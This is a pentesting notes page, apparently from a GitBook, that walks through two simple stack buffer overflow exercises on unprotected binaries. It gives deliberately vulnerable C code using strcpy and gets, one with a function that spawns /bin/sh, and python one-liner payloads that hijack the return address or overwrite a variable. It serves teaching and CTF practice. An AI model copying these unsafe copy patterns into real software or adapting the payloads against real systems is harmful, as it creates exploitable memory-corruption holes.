Pentesting
  • API Pentesting
  • Pivoting techniques
  • Aquatone
  • NOSQL injections
  • Basic LDAP Injection
  • Basic authentication bypass
  • SERVER SIDE REQUEST FORGERY (SSRF)
  • SQL injections
  • SSTI
  • Easy - No Protections
  • GENERAL INFORMATION
  • XML External Entity (XXE) Injection Payloads
  • Post exploitation techniques
  • Hashcat Cheatsheet
  • John The Ripper Cheatsheet
  • Cracking files
  • Wordlists & co.
  • WinRM (Windows Remote Management) Pentesting
  • API windows
  • Command find priv /esc
  • Crawl/Fuzz
  • HTTP Request Smuggling
  • Api keys
  • Pivoting, Tunneling, and Port Forwarding
  • Shells & Payloads
  • API Recon
  • API Token Attacks
Powered by GitBook
On this page

Easy - No Protections

PreviousSSTINextGENERAL INFORMATION

Last updated 1 year ago

Simple Buffer Overflow (no protection) - Function call # Code void copy_ordre(char *arg) { char ordre[50]; strcpy(ordre,arg); printf("Ordre reçu : %s\n",ordre); } int main(int argc, char** argv) { if(argc < 2) { printf("Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre."); printf("Usage: %s <ordre>", argv[0]); exit(0); } printf("Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre."); copy_ordre(argv[1]); earth_destroy(); return 0; } void earth_destroy() { printf("Mauvaise réponse ! Nous détruirons votre planète dans quelques minutes."); } void earth_alive() { printf("Nous nous avouons vaincu. Vous avez gagné, nous vous rendons la terre !"); execve("/bin/sh", NULL, NULL); } # Explanations and Exploit # The goal is to call earth_alive() function # The buffer is 50 bytes long, so by submitting 50+ char, you can override what is after # You have EIP, EBP and one argument (char) on the stack, so 12 bytes # So, to override what you want and call the function, you will need to send 62 char before the payload # The payload is the function adress you want to send $ nm ./pwn1 | grep "earth_alive" 08048acb T earth_alive # So, the payload will be the following ./pwn1 $(python -c 'print "A"*62 + "\xcb\x8a\x04\x08"') Simple BoF - Int override # Code int main() { char buf[20]; int x = 0; gets(buf); if (x == 1234) { // gid_t gid = getegid(); // setresgid(gid, gid, gid); FILE *fp; fp = fopen("flag.txt", "r"); char flag[64]; fgets(flag, 64, (FILE*) fp); printf("Oh, un flag : %s", flag); } printf("x value : %d", x); return 0; } # Exploitation and Explanations # You want to override the “x” value # In the stack, 20 bytes are allowed to the buffer and 4 bytes are allowed to a pointer for this buffer. # After that comes the value of x, so you can overflow here $ python -c 'print "a"*24 + "\xd2\x04\x00\x00"' | ./pwn0 $ python -c 'print "a"*24 + "\xd2\x04"' | ./pwn0 $ python -c 'print "a"*22 + "\x00\x00\xd2\x04"' | ./pwn0

Page cover image